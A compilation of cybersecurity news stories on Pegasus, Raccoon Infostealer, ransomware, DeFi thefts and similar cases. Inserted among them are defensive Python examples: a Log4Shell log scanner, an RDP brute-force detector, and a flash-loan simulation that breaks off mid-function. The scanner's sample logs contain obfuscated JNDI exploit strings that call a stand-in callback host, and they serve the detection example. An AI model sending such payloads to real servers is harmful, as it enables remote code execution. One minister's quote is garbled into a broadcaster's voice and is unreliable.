
FBI Nearly Adopted NSO's Spyware

According to a report published by the New York Times on Saturday, officials at the US Federal Bureau of Investigation worked to advance the deployment of Pegasus, the notorious phone-hacking tool made by Israel's NSO Group.

What is Pegasus?

Once installed, Pegasus gives its operator full control of the target's phone: reading messages, listening in on calls, and turning the device into a remote listening device.

Large numbers of human rights activists, journalists, politicians, and corporate executives were reportedly selected as potential targets of Pegasus, which has drawn heavy criticism of the Israeli company that developed it.

When smartphones are infected with Pegasus, they effectively become portable surveillance tools that can be used to read the target's messages, browse through the images, or even switch on the user's camera and microphone secretly.

FBI Purchased Pegasus 

The files, described as highly classified and released to the Times in response to a Freedom of Information Act (FOIA) request, reveal that bureau officials had drafted guidelines for federal prosecutors on how to disclose the use of Pegasus in court proceedings, and were well advanced in preparing to brief FBI leadership on the tool.

The FBI has asserted that Pegasus was never used to assist an FBI investigation. The bureau obtained only a limited license for product testing and evaluation, and, as its statement read, "There was no functional use in support of any investigation."

The announcement represents a clear admission by the FBI that it purchased Pegasus, one of the most advanced hacking tools in existence.

Earlier this year, the press reported that the FBI had also evaluated Phantom, an NSO product capable of hacking US phones. As reports linked NSO's spyware to human rights abuses around the world and negative coverage of the technology spread, the FBI ultimately decided against using it.

The New York Times first reported that the FBI had acquired Pegasus in 2019, during the Trump administration. The bureau has still not ruled out using comparable technology in the future, the report said, citing recent court filings.

A legal brief submitted on the bureau's behalf last month stated that "just because the FBI eventually decided not to deploy the tool in support of criminal investigations does not mean it would not test, evaluate, and potentially deploy other similar tools for gaining access to encrypted communications used by criminals."



A Cyberattack Made Possible by Russia's Invasion of Ukraine

 


A few weeks after Russia began bombing Ukraine in late February, a talented young computer programmer named Mark Sokolovsky and his girlfriend climbed into a Porsche Cayenne and set out on a road trip, apparently to get as far from the fighting as possible.

The pair drove through Poland and Germany before stopping in the Netherlands, which they took to be their final destination.

Unbeknownst to the couple, FBI investigators in the United States, working with their counterparts in Europe, were tracking them the whole way.

Late last year, Sokolovsky, 26, had been named as a defendant in a sealed criminal indictment in federal court in Texas. The indictment alleges that he was a principal developer and operator of the malware known as Raccoon Infostealer, which has infected millions of computers around the world and allowed criminals to steal login credentials, including for financial institutions, and money from an untold number of victims.

A few days after entering the Netherlands, Sokolovsky was arrested in Amsterdam. He is charged with computer fraud, wire fraud, money laundering, and identity theft, and faces more than 20 years in prison if convicted. He remains in custody in the Netherlands while fighting extradition to the United States.

Sokolovsky's Dutch attorney Niels Van Schaik, who is currently representing him in the extradition proceedings, has not responded to messages left for him. 

The case remained under seal until last week, when authorities announced Sokolovsky's arrest as part of a coordinated effort to identify victims. Investigators say that shortly after the arrest they recovered a huge cache of stolen data containing millions of email addresses and login credentials.

Earlier this week, the FBI and prosecutors announced a website where potential victims can check whether their information appears in the data recovered by investigators.

Ashley Hoff, U.S. Attorney for the Western District of Texas, described the case as a very large one with implications around the world. "This is a very, very global case," Hoff said.

"We steal, you deal"

The developers of malware-as-a-service (MaaS) programs typically do not steal from victims themselves. Instead, they license the software to other cybercriminals, who use it to drain victims' savings. Raccoon's operators, however, also kept a copy of all the information their customers stole.

According to cybercrime experts, Raccoon Infostealer was run much like a legitimate software business: its operators offered round-the-clock customer support and shipped updates every few weeks. A weekly license cost $75 and a monthly one $200.

Raccoon Infostealer first appeared in early 2019. It was initially offered for sale on Russian-language forums popular with cybercriminals and later on English-language ones as well. Marketed under the slogan "We steal, you deal," it quickly drew the attention of cybersecurity researchers and became a hit with criminals.

Shortly after Sokolovsky's arrest in March, Raccoon's operators told their customers that they were shutting down, saying the war in Ukraine had disrupted their operations.

Raccoon Infostealer belongs to the malware-as-a-service class and was among its most popular offerings. "Unfortunately, due to the 'special operation,' we will have to close down our Raccoon Stealer project," the group said in a statement. "Several members of our team who were responsible for critical components of the product are no longer with us. It has been a pleasure to work with you, and I am thankful for your time and experience, because, unfortunately, everything comes to an end sooner or later."

From the start of the invasion, Russian President Vladimir Putin's government required it to be called a "special operation"; Russians who called it a war or an invasion risked long prison sentences.

Many in the cybersecurity community read the Raccoon shutdown message as saying that several senior programmers had been killed in the fighting. It may instead have been a reference to Sokolovsky's arrest.

We left a message on the Raccoon operators' website asking for comment, but they did not respond immediately. After Sokolovsky's arrest was announced last week, they issued a statement saying they had not known him personally and that, when he disappeared in March, "we naturally thought the worst when we heard the news about it."

A few months later, experts said, a revised version of the software was relaunched with significant changes to its code.

On the run

Sokolovsky is from Kharkiv in eastern Ukraine, where he attended university and continued to live. Russian forces bombarded the city heavily in the early stages of the war, causing extensive damage.

According to the blog of cybersecurity reporter Brian Krebs, authorities tied Sokolovsky to Raccoon through his Apple iCloud account, which was linked to as many as three accounts associated with the Raccoon malware program.

This allowed authorities to track Sokolovsky's movements for two to three months, Krebs reported. Investigators also retrieved a photograph showing Sokolovsky posing with a large pile of cash.

In the months that followed, investigators watched Sokolovsky shuttle between Kharkiv and the Ukrainian capital, Kyiv.

That changed dramatically in late March, when he turned up in Poland near the German border. A photograph captured Sokolovsky driving a Porsche Cayenne into Germany with his girlfriend in the passenger seat.

At the time, Ukrainian men under the age of 60 were barred from leaving the country so that they could be called up to fight the Russian invasion. Investigators believe Sokolovsky may have bribed his way out of the country, Krebs reported.

Authorities were able to pinpoint Sokolovsky in Amsterdam after his girlfriend posted pictures of the two of them there on Instagram, and he was arrested a few days later, Krebs reported.

A Dutch court ruled on the request for Sokolovsky's extradition to Texas last month; he has appealed the decision and remains in custody in the Netherlands.

Reaching out across the globe 

Prosecutors allege that Sokolovsky, the main architect of Raccoon, had help from several accomplices. Italian and Dutch authorities took part in the investigation, prosecutors said.

Prosecutors said the FBI recovered some 50 million unique credentials from the data cache, including email addresses, bank logins, cryptocurrency addresses, and credit card numbers. They do not believe they have recovered all of the data stolen with Raccoon Infostealer, and the investigation is continuing.

Court documents indicate that the recovered data includes login information for several U.S. companies, as well as for military personnel with access to armed forces computers.

Missing Cryptoqueen: Leaked Police Files May Have Alerted the OneCoin Fraudster Ruja Ignatova

 

Ruja Ignatova, the fugitive known as the "Missing Cryptoqueen" and listed on the US Federal Bureau of Investigation's (FBI) most wanted list, is believed to have received leaked information about the investigation before her disappearance.
 
The 42-year-old Bulgarian is charged over her alleged role in the $4 billion OneCoin cryptocurrency fraud, the subject of the BBC podcast 'The Missing Cryptoqueen'.

Police documents from the case were shown to the podcast by Frank Schneider, a former spy and trusted adviser to Ignatova. Schneider himself is now facing extradition to the US over his alleged role in the OneCoin fraud.

Schneider denies obtaining the documents himself and says Ignatova gave them to him on a USB memory stick; the files' metadata suggests she acquired them through her own contacts in Bulgaria.
 
Ignatova disappeared on October 25, 2017, after learning of the police investigation into OneCoin. In June 2022 she was added to the FBI's most wanted list.
 
Schneider told the BBC that the police files included presentations from a Europol meeting named 'Operation Satellite', held five months before Ignatova's disappearance and attended by officials from Dubai, Bulgaria, the UK, Germany, and the Netherlands, as well as the FBI, the US Department of Justice, and the New York District Attorney.
 
The documents revealed that US authorities had a "high-placed confidential informant", identified OneCoin bank accounts receiving investor funds, and described failed attempts by the UK's City of London Police to interview Ignatova.

Asked about the files, Schneider said: "When the Bulgarians participated at certain Europol meetings, it only took hours for her to get a complete rundown and get the minutes of what was said in those meetings. I can only deduce that it came from the circles that she was in and the [contacts] she had through a variety of influential personalities."

FBI Warns of Hack Operations From Iranian Hackers

The FBI warns that the Iranian threat group Emennet Pasargad may conduct hack-and-leak operations against US interests, in particular around the November midterm elections, even though the group's primary focus has been Israeli targets.

In November 2021 the US Treasury sanctioned five Iranians and Emennet Pasargad, the firm they worked for, after the US had warned in November 2020 that Iranian hackers had exploited known vulnerabilities to obtain voter registration data.

According to the FBI, Emennet has been conducting cyber-enabled information operations against organizations, primarily in Israel, since at least 2020. These operations follow a pattern of initial intrusion, data theft and leak, amplification of the leak through online forums and social media, and in some cases deployment of destructive encryption malware.

The group also targets organizations running PHP-based websites or externally reachable MySQL databases, and, the FBI says, frequently relies on open-source penetration-testing tools in its attacks.

The Bureau says Emennet conducts false-flag operations against Israel under online personas posing as hacktivists or cybercriminal groups, and warns that it may use the same tactics against US entities. Most of the techniques described in the report were used by the group during the 2020 U.S. presidential election.

The FBI also warned that the group would 'probably' target popular content-management systems such as Drupal and WordPress, and that Emennet has exploited the infamous Log4j vulnerability in an attack on at least one U.S.-based company.
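Because Log4j exploitation starts with a `${jndi:...}` lookup string delivered in a request header, path or query parameter, web-server access logs are the first place to look for it. The following Python is an added example, not code from the page or from the FBI advisory: it scans constructed access-log lines (the combined log format and the documentation address 203.0.113.7 are assumptions) for Log4Shell (CVE-2021-44228) probes, including the common obfuscations that nest Log4j's own `${lower:...}`, `${upper:...}` and `${x:-default}` lookups to hide the word "jndi" from naive string filters.

```python
import re
from urllib.parse import unquote

# Constructed sample access-log lines (combined log format). They are not taken from the
# page or the FBI advisory; 203.0.113.7 is a documentation address standing in for an
# attacker-controlled LDAP/RMI server.
SAMPLE_LOGS = [
    '10.0.0.5 - - [10/Dec/2021:10:00:01 +0000] "GET / HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '10.0.0.9 - - [10/Dec/2021:10:00:02 +0000] "GET / HTTP/1.1" 200 512 "-" "${jndi:ldap://203.0.113.7:1389/a}"',
    '10.0.0.9 - - [10/Dec/2021:10:00:03 +0000] "GET /?x=${${lower:j}ndi:${lower:l}dap://203.0.113.7/b} HTTP/1.1" 404 0 "-" "curl/7.79"',
    '10.0.0.9 - - [10/Dec/2021:10:00:04 +0000] "GET / HTTP/1.1" 200 512 "-" "${${::-j}${::-n}${::-d}${::-i}:rmi://203.0.113.7/c}"',
    '10.0.0.5 - - [10/Dec/2021:10:00:05 +0000] "GET /price?amount=${total} HTTP/1.1" 200 20 "-" "Mozilla/5.0"',
    '10.0.0.9 - - [10/Dec/2021:10:00:06 +0000] "GET /?q=%24%7Bjndi%3Aldap%3A%2F%2F203.0.113.7%2Fd%7D HTTP/1.1" 404 0 "-" "python-requests/2.27"',
]

# Log4j 2 lookup forms commonly used to hide the string "jndi" from naive filters:
#   ${lower:J} / ${upper:j}  -> case-conversion lookups
#   ${::-j} / ${env:X:-j}    -> default-value syntax; the text after ":-" is substituted
_CASE_LOOKUP = re.compile(r"\$\{(lower|upper):([^${}]*)\}", re.IGNORECASE)
_DEFAULT_LOOKUP = re.compile(r"\$\{[^${}]*:-([^${}]*)\}")
_JNDI_LOOKUP = re.compile(r"\$\{jndi:[^}]*\}", re.IGNORECASE)


def normalize(text: str, max_rounds: int = 10) -> str:
    """Collapse nested case/default lookups (innermost first) so that an obfuscated
    ${jndi:...} lookup becomes literal. URL-decoding runs first because the probe is
    usually delivered percent-encoded in a path or query string."""
    text = unquote(text)
    for _ in range(max_rounds):
        expanded = _CASE_LOOKUP.sub(
            lambda m: m.group(2).lower() if m.group(1).lower() == "lower" else m.group(2).upper(),
            text,
        )
        expanded = _DEFAULT_LOOKUP.sub(lambda m: m.group(1), expanded)
        if expanded == text:
            break
        text = expanded
    return text


def find_jndi_lookups(line: str) -> list:
    """Return every JNDI lookup present in a log line after de-obfuscation."""
    return _JNDI_LOOKUP.findall(normalize(line))


def scan(lines) -> list:
    """Return (line_index, source_ip, decoded_lookup) for each Log4Shell probe found."""
    hits = []
    for index, line in enumerate(lines):
        source_ip = line.split(" ", 1)[0]
        for lookup in find_jndi_lookups(line):
            hits.append((index, source_ip, lookup))
    return hits


if __name__ == "__main__":
    for index, source_ip, lookup in scan(SAMPLE_LOGS):
        print(f"line {index}: {source_ip} sent {lookup}")
```

The de-obfuscation loop matters more than the final pattern: a rule that only looks for the literal `${jndi:` misses three of the four probes in the sample, while the normalized form also gives you the attacker's callback host to block or hunt for in outbound LDAP/RMI traffic.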

In February the U.S. State Department offered a $10 million reward for information on Seyyed Mohammad Hosein Musa Kazemi and Sajjad Kashian, two Iranian contractors working for Emennet Pasargad who are accused of running operations intended to sow discord and undermine voters' confidence in the American electoral process.

Kazemi and Kashian remain at large and are believed to be in Iran; both have been added to the FBI's list of wanted cyber criminals. The FBI's advisory also gives organizations guidance on reducing the risk posed by Emennet and lists the tactics, techniques, and procedures (TTPs) associated with the group.


Cyber-Attackers Claim to Have Accessed Customer Data at Medibank Australia

 


Medibank, which insures one in six Australians, said an unidentified person had contacted the company claiming to have stolen some 200 gigabytes of data, including medical diagnoses and treatments, a week after the company first disclosed the intrusion.

The company did not say how many of its 4 million customers may be affected, but warned that the number is likely to rise as the investigation unfolds. The Australian Federal Police said they had opened an investigation into the breach but declined to comment further.

The breach adds to a wave of cyberattacks on the country's largest companies since No. 2 telco Optus, owned by Singapore Telecommunications Ltd, revealed a month ago that the data of ten million customers may have been stolen.

Public commentary has so far focused mostly on the risk that stolen data could be used for identity theft or to gain access to bank accounts. The Sydney Morning Herald reported receiving a message from a person claiming to be the Medibank hacker, threatening to publish the medical records of high-profile individuals unless a payment was made.

The Melbourne-based insurer is working with several cyber-security firms and has contacted the Australian Cyber Security Centre (ACSC), the government's lead agency for cyber security.

"This is a situation where we have very sensitive information regarding healthcare and that information, if made public by itself, could cause severe harm to Australians, and that is why we at the Australian Broadcasting Corporation are so actively involved with this," said Cybersecurity Minister Clare O'Neill in an exclusive interview with the ABC.

Cyber security experts said it was unclear whether the various breach disclosures were linked, given how different the attacks were. The publicity generated by the Optus attack, however, may have drawn hackers' attention to Australian targets.

"When there is a highly visible breach, such as what happened to Optus in Australia, then hackers take notice of it and think they are going to try to see what they can get away with down there," said Jeremy Kirk, executive editor at Information Security Media Group, a leading cybersecurity specialist publication.

Optus rival Telstra Corp Ltd disclosed on Tuesday a breach of employee data, while Woolworths Group Ltd said on Thursday that an unidentified party had gained unauthorized access to the customer database of a bargain-shopping website used by more than 2.2 million shoppers.

The high-profile breaches show how crucial it is to use multi-factor authentication, in which a login also requires a code sent to a separate device, at every level of a company's network to prevent data breaches, according to Sanjay Jha, chief scientist at the University of New South Wales Institute for Cybersecurity.

Companies may have such controls in place for end users, but they need even tougher controls on internal servers, since server security is a major concern, Jha told Reuters by phone.

"Continuous authentication is necessary so that people do not log in and then leave forever, allowing attackers to access your computer and compromise it," Jha continued.

Dan Woods, chief intelligence officer at F5 and a former FBI cyberterrorism investigator, commented that Australia had "undoubtedly endured its most difficult few weeks from a cybercrime perspective, but on the positive side, it's been a wake-up call for the country, one that it may have needed."

What is Ransomware 3.0? An Advanced Extortion Technique?


The FBI's Internet Crime Complaint Center received 3,729 ransomware complaints in 2021, an 82% rise over 2019, and the trend is worsening. According to the US Department of the Treasury, the top 10 ransomware groups have taken in at least $5.2 billion in extortion payments.

Ransomware's scale and growth have drawn the attention of business and policy leaders, but it is worth considering how ransomware operators may adapt and evolve to protect their earnings.

Before the ransomware boom, threat actors monetized intrusions in various ways. Some stole and sold sensitive information such as credit card numbers; some focused on ACH transfers and other direct financial fraud; others resold system access for scrap value to other threat actors, or mined cryptocurrency, pushing the monetization problem downstream. The most profitable techniques required skilled operators and sustained, persistent access, so getting caught could wipe out operations that had taken a considerable investment of time.

Ransomware changed the extortion game: the blunt technique was easy to execute and effective.

Early ransomware did not need to understand the victim's network, paid little attention to anti-forensics or caution, and yielded direct, near-instant payment without relying on black-market resellers.

With a short operation cycle, higher profits, and a low barrier to entry, ransomware paved the way for an explosion of cybercrime.

Future of Ransomware

Threat actors will certainly keep modifying the ransomware playbook. We may see groups develop more advanced tradecraft to frustrate attribution, blunting the effect of government sanctions lists and the payment bans that come with them.

We are at the initial stage of the Ransomware 3.0 evolution, and the extortion models will keep changing. Attackers may move beyond the traditional ransomware model, reselling stolen data alongside, or instead of, extortion.

We are already aware that threat actors are experimenting with various cryptocurrency schemes. 

To stay safe, the FBI suggests:

  • Update your operating system and software.
  • Implement user training and phishing exercises to raise awareness about the risks of suspicious links and attachments.
  • If you use Remote Desktop Protocol (RDP), secure and monitor it.
  • Make an offline backup of your data.
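The third item, securing and monitoring RDP, is in practice mostly about noticing password guessing against the RDP listener before a guess succeeds. The following Python is an added example and not part of the FBI's guidance or the page: it runs a simple brute-force detector over constructed Windows Security log records (the flattened one-line record format, the thresholds, and the IP addresses are assumptions) and reports any source that produced a burst of failed RDP logons, together with any successful RDP logon from that same source after the burst began, which is the case that needs an immediate response.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample records (not from the page), one Windows Security event per line in
# the flattened form a SIEM export or a Get-WinEvent script might produce.
#   EventID 4625 = failed logon, 4624 = successful logon
#   LogonType 10 = RemoteInteractive (RDP/Terminal Services)
# With Network Level Authentication enabled, a rejected RDP credential is logged as
# LogonType 3 (network) rather than 10, so both types are counted by default.
SAMPLE_EVENTS = [
    "2022-09-01T02:00:01 EventID=4625 LogonType=10 TargetUser=administrator SourceIP=198.51.100.23",
    "2022-09-01T02:00:09 EventID=4625 LogonType=10 TargetUser=admin SourceIP=198.51.100.23",
    "2022-09-01T02:00:15 EventID=4625 LogonType=10 TargetUser=backup SourceIP=198.51.100.23",
    "2022-09-01T02:00:40 EventID=4625 LogonType=10 TargetUser=administrator SourceIP=198.51.100.23",
    "2022-09-01T02:01:03 EventID=4625 LogonType=10 TargetUser=it SourceIP=198.51.100.23",
    "2022-09-01T02:02:30 EventID=4624 LogonType=10 TargetUser=it SourceIP=198.51.100.23",
    "2022-09-01T02:05:00 EventID=4625 LogonType=3 TargetUser=jsmith SourceIP=203.0.113.50",
    "2022-09-01T03:15:00 EventID=4625 LogonType=3 TargetUser=jsmith SourceIP=203.0.113.50",
    "2022-09-01T08:30:00 EventID=4624 LogonType=10 TargetUser=jsmith SourceIP=10.0.0.12",
]

_RECORD = re.compile(
    r"^(\S+) EventID=(\d+) LogonType=(\d+) TargetUser=(\S+) SourceIP=(\S+)$"
)


def parse_event(line: str) -> dict:
    """Parse one flattened record into typed fields."""
    match = _RECORD.match(line.strip())
    if not match:
        raise ValueError(f"unrecognised record: {line!r}")
    stamp, event_id, logon_type, user, ip = match.groups()
    return {
        "time": datetime.fromisoformat(stamp),
        "event_id": int(event_id),
        "logon_type": int(logon_type),
        "user": user,
        "ip": ip,
    }


def rdp_bruteforce_report(lines, threshold: int = 5, window_minutes: int = 5,
                          logon_types=(10, 3)) -> dict:
    """Flag source IPs with >= threshold failed RDP logons inside any window_minutes span,
    and record any successful RDP logon from that IP after the burst started."""
    window = timedelta(minutes=window_minutes)
    events = sorted((parse_event(line) for line in lines), key=lambda e: e["time"])
    failures, successes = defaultdict(list), defaultdict(list)
    for event in events:
        if event["logon_type"] not in logon_types:
            continue
        if event["event_id"] == 4625:
            failures[event["ip"]].append(event)
        elif event["event_id"] == 4624:
            successes[event["ip"]].append(event)

    report = {}
    for ip, fails in failures.items():
        times = [f["time"] for f in fails]  # already in time order
        burst_start = None
        for i, start in enumerate(times):
            in_window = sum(1 for t in times[i:] if t - start <= window)
            if in_window >= threshold:
                burst_start = start
                break
        if burst_start is None:
            continue
        later_successes = [s["user"] for s in successes.get(ip, []) if s["time"] >= burst_start]
        report[ip] = {
            "failures": len(fails),
            "usernames": sorted({f["user"] for f in fails}),
            "success_after_burst": later_successes,
        }
    return report


if __name__ == "__main__":
    for ip, details in rdp_bruteforce_report(SAMPLE_EVENTS).items():
        print(ip, details)
```

On the sample data, 198.51.100.23 is flagged for five failures in just over a minute followed by a successful logon as "it", which is the pattern of a guessed password; 203.0.113.50 produces only two widely spaced failures and is ignored at the default threshold. In a real deployment the records would come from Event Log forwarding or a SIEM query, and the sensible follow-up is to pair the alert with a lockout policy and to stop exposing RDP directly to the internet at all.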




Ex-NSA Employee Charged in Espionage Case

A former U.S. National Security Agency (NSA) employee from Colorado has been arrested for attempting to sell classified information to someone he believed was a foreign agent, allegedly to pay off his debts.

According to court documents released on Thursday, the person to whom the accused, Jareh Sebastian Dalke, 30, tried to sell the information was in fact an undercover agent working for the Federal Bureau of Investigation (FBI).

Dalke believed he was in contact with a representative of a particular nation "with many interests that are adverse to the United States," but was actually communicating with an undercover FBI agent, according to his arrest affidavit.

Dalke was arrested on Wednesday after he allegedly agreed to hand over further classified material. "On or about August 26, 2022, Dalke requested $85,000 in return for additional information in his possession. Dalke agreed to transmit additional information using a secure connection set up by the FBI at a public location in Denver," the DoJ said; that meeting led to his arrest.

Dalke was employed at the NSA from June 6 to July 1, 2022, as an Information Systems Security Designer on a temporary assignment in Washington, D.C. He is also accused of transferring additional National Defense Information (NDI) to the undercover FBI agent at an undisclosed location in Colorado.

He was arrested on September 28 and charged with three violations of the Espionage Act. The arrest affidavit does not identify the country Dalke believed he was dealing with.

The affidavit, filed by the FBI, states that Dalke served in the U.S. Army from about 2015 to 2018, holding a Secret security clearance from 2016, and held a Top Secret security clearance during his time at the NSA.

"Between August and September 2022, Dalke used an encrypted email account to transmit excerpts of three classified documents he had obtained during his employment to an individual Dalke believed to be working for a foreign government," the Justice Department (DoJ) said in a press release.

Interpol Arrests 12 Suspects for Running Sextortion Racket


A joint operation to crack down on a sextortion racket

Interpol has announced the arrest of 12 individuals suspected of being core members of a transnational sextortion ring.

The arrests took place in July and August following a joint investigation by Interpol's cybercrime division and police in Singapore and Hong Kong.

The #YouMayBeNext campaign, supported by 75 INTERPOL member countries and 21 public and private entities, focuses specifically on sextortion, Distributed Denial of Service (DDoS), and ransomware attacks.

Illustrating the challenge these attacks pose, the INTERPOL-supported international police operation identified and tracked down a transnational sextortion ring that had extracted around USD 47,000 from its targets.

So far the investigation has traced 34 cases back to the syndicate.

What is sextortion?

Sextortion is a crime and a form of sexual exploitation in which an individual is coerced, through threats or manipulation, into producing sexually explicit content and sending it over the internet.

The suspects approached potential victims through online dating and sex platforms, lured them into downloading a malicious mobile app, and tricked them into "naked chats."

The app harvested the victims' phone contact lists, which the suspects then used to blackmail them, threatening to leak their nude videos to relatives and friends.

The victims of the sextortion racket are mostly from Hong Kong and Singapore.

Raymond Lam Cheuk Ho, Acting Head of the Hong Kong Police's Cyber Security and Technology Crime Bureau, said:

"We conducted a proactive investigation and in-depth analysis of a zombie command and control server hosting the malicious application, which – along with the joint efforts by our counterparts – allowed us to identify and locate individuals linked to the criminal syndicate.”

INTERPOL's warning 

Interpol has also warned of a surge in sextortion incidents in recent years, a rise aggravated by the Covid-19 pandemic.

It notes that a single click on a malicious link, or sending an intimate video or picture to someone, is enough to expose users to sextortion.

Last year, the FBI's Internet Crime Complaint Center (IC3) raised the alarm about a sharp rise in sextortion complaints since the start of 2021, with financial losses of more than $8 million by July 2021.

The FBI received more than 16,000 sextortion complaints through July 2021; most victims were between 20 and 39 years old.

How to be safe from sextortion?

Security Affairs reports the following measures to stay safe from sextortion threats:

  • NEVER send compromising images of yourself to anyone, no matter who they are or who they say they are.
  • Do not open attachments from people you do not know. Links can secretly hack your electronic devices using malware to gain access to your private data, photos, and contacts, or control your web camera and microphone without your knowledge.
  • Turn off your electronic devices and web cameras when not in use.


FBI: Hackers use DeFi Bugs to Steal Cryptocurrency

 


The FBI is warning investors that hackers are increasingly exploiting security flaws in Decentralized Finance (DeFi) platforms to steal cryptocurrency.

According to the public service announcement (PSA) posted on the FBI's Internet Crime Complaint Center (IC3) today, nearly 97% of the $1.3 billion in cryptocurrency stolen between January and March 2022 was taken from DeFi platforms, up from 72% in 2021 and roughly 30% in 2020, according to FBI estimates.

The FBI urges investors to be aware of the risks, seek professional advice if unsure, and research the security and general business practices of DeFi providers. DeFi providers here means the exchanges, marketplaces, and other platforms where users buy, sell, trade, and borrow bitcoin and other digital assets.

The FBI's warning follows an April analysis by Chainalysis showing that, on Q1 2022 figures, DeFi platforms are being targeted more than ever.

In most cases the attackers exploit flaws in the platform's code, or gain unauthorized access, to drain cryptocurrency to addresses under their control.

According to Chainalysis, the actors behind these attacks laundered most of the funds stolen in 2022 through high-risk services such as illicit exchanges and dark-web coin tumblers.

The FBI's alert provides investors with guidance that begins with basic cautions about performing due diligence before investing and then suggests the following:

  • Before investing, research DeFi platforms, protocols, and smart contracts, and be aware of the risks associated with DeFi investments.
  • Verify whether the DeFi platform has undergone one or more code audits by independent auditors. A code audit normally entails a careful review of the platform's underlying code to find flaws or vulnerabilities that could compromise the platform.
  • Be wary of DeFi investment pools with short join windows and rapid smart contract rollouts, especially if they have not had the recommended code audit.
  • Be mindful of the risks that crowdsourced approaches to finding and patching vulnerabilities can pose. Open source code repositories give unfettered access to anyone, including those with malicious intent.

So far this year none of the funds stolen from DeFi platforms have been returned, suggesting attackers are less inclined to give back what they steal than in 2021, when almost 25% of all cryptocurrency stolen via DeFi platforms was eventually recovered and returned to the victims.

In April the FBI attributed the attack on Axie Infinity's Ronin network bridge, now the largest crypto theft ever, to the North Korean threat groups Lazarus and BlueNorOff (also known as APT38).

Before that, the largest cryptocurrency theft to date was the $611 million breach of the cross-chain protocol Poly Network in August 2021.




20K Users' Data was Stolen by Blackbyte Ransomware Group

 


The NFL's San Francisco 49ers are sending notification letters to more than 20,000 people whose data was exposed in a ransomware attack on the team's network earlier this year.

The BlackByte ransomware group hit the team's network a week before Super Bowl Sunday, raising the question of what would have happened had the club held its late lead in the conference championship two weeks earlier and advanced to the title game.

According to the team, the attackers accessed and stole personal information belonging to 20,930 people between February 6 and February 11, 2022.

On Monday, the team said its investigation had now established that the theft took place over six days, and that it has begun sending notification letters to those whose data may have been exposed. The organization said it "conducted a thorough assessment of these data to discover the individuals whose data was stored within, and additional research to locate and validate the addresses for these people."

A total of 20,930 names and associated Social Security numbers were taken during the incident, the team stated in its notification to the Maine Attorney General's Office, to which it is required by law to report breaches affecting Maine residents.

BlackByte claimed the attack on February 12, the day before Super Bowl 2022, by leaking files it said were taken from the 49ers' network.

The ransomware organization released an archive with 292 MB worth of files it claimed were invoices taken from the 49ers' infected systems.

According to researchers, the group first surfaced in September 2021 with a crude first version of its ransomware. Trustwave found a flaw in how it handled encryption keys and used it to release a free decryptor.

The group then shipped a second version of the ransomware that fixed the flaw Trustwave had found, and went on to carry out many more attacks. The day before the 49ers attack became public, the FBI had issued an advisory on BlackByte.

FBI Cyber Experts to Examine Attacks on Montenegro Government Infrastructure


The U.S. Federal Bureau of Investigation (FBI) will deploy a team of cyber experts to Montenegro to investigate a large, coordinated attack on the Balkan nation's digital infrastructure, the country's interior ministry announced on Wednesday.

The rapid deployment of the FBI cyber team demonstrates "the excellent cooperation between the United States of America and Montenegro and proof that we can count on their support in any situation," Montenegro's Ministry of Internal Affairs said.

Last week, a combination of ransomware and DDoS attacks disrupted government services and forced the national electrical utility to switch to manual control. Montenegro's Agency for National Security (ANB) blamed Russia and said about €2.5 million had been spent to mount the attacks.

“Coordinated Russian services are behind the cyber attack,” the ANB stated. “This kind of attack was carried out for the first time in Montenegro and it has been prepared for a long period of time.” 

According to Dusan Polovic, Director of the Directorate for Information Security, 150 computers across twelve state entities were infected with malware. There was no permanent damage to Ministry of Public Administration data, but some retail tax collection was affected.

The infected workstations have been taken off the network and their hard drives pulled for forensic analysis, he said, adding that the priority is to bring the tax system back online, but only once it is fully secured.

Government officials have confirmed that the ANB suspects the Kremlin is behind the attacks, possibly in retaliation for Montenegro joining NATO in 2017 over strong Russian opposition and for joining Western sanctions against Moscow after the invasion of Ukraine in February.
On Friday, the U.S. Embassy in Podgorica recommended U.S. citizens restrict movement and travel in the country to the necessities and have travel documents up to date and easily accessible, fearing that the attack could disrupt transportation (including border crossings and airport), and telecommunication sectors. 

Russia has recently targeted several other Eastern European countries, including Moldova, Slovenia, and Bulgaria, with denial-of-service campaigns, which make websites unreachable by flooding them with junk traffic but do not destroy data. The assault on Montenegro's infrastructure appeared far more coordinated, with targets that included water supply systems, transportation services, and online government services, among many others.

FBI Alerts of Rise in Attacks Targeting DeFi Platforms


The FBI is warning of an increase in cryptocurrency theft attacks on decentralised finance (DeFi) platforms.

According to the agency, criminals are taking advantage of the growing interest in cryptocurrency, along with the complex functionality and open-source nature of DeFi platforms, to carry out their attacks.

According to the FBI, cybercriminals are stealing virtual currency and causing investors to lose money by exploiting security flaws in the smart contracts that govern DeFi platforms. Smart contracts are self-executing programs stored on the blockchain whose code encodes the terms of an agreement between the parties, so a bug in that code can be exploited by anyone able to call it.

DeFi platforms accounted for roughly 97% of the $1.3 billion in cryptocurrencies stolen by cybercriminals between January and March 2022, an increase from 72% in 2021 and 30% in 2020.

According to the FBI, cybercriminals have also taken out flash loans to trigger an exploit in a DeFi platform's smart contracts (causing about $3 million in cryptocurrency losses), exploited a signature verification flaw in a DeFi platform's token bridge to withdraw all of its investments (about $320 million in losses), and manipulated cryptocurrency price pairs (to steal about $35 million).
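The flash loan and price-pair manipulation cases above follow one pattern: a lending protocol prices collateral from a liquidity pool's spot price, and an attacker who can move that price within a single transaction can borrow far more than the collateral is worth. The following is an added example, not code from the FBI alert or from any real protocol; the constant-product pool, the lender's loan-to-value rule, the reserves and the loan sizes are all constructed for illustration, with fees omitted. It shows the attack succeeding against a spot-price oracle and failing against a time-weighted average price (TWAP) that only sees prices recorded at earlier block boundaries.

```python
"""Simulated flash-loan price manipulation against a DeFi lending pool.

Added example: not code from the FBI alert or any real protocol. The pool,
lender, reserves and loan sizes are all constructed for illustration.
"""
from dataclasses import dataclass, field
from statistics import mean
from typing import Callable, Dict, List


@dataclass
class Pool:
    """Constant-product AMM (x * y = k) holding token A and token B, no fees."""
    reserve_a: float
    reserve_b: float
    observations: List[float] = field(default_factory=list)  # one spot price per finalised block

    def spot_price(self) -> float:
        """Marginal price of one B in units of A: what a naive on-chain oracle reads."""
        return self.reserve_a / self.reserve_b

    def end_block(self) -> None:
        """Record the closing price; a TWAP oracle only ever sees these snapshots."""
        self.observations.append(self.spot_price())

    def swap_a_for_b(self, amount_a: float) -> float:
        k = self.reserve_a * self.reserve_b
        self.reserve_a += amount_a
        out_b = self.reserve_b - k / self.reserve_a
        self.reserve_b = k / self.reserve_a
        return out_b

    def swap_b_for_a(self, amount_b: float) -> float:
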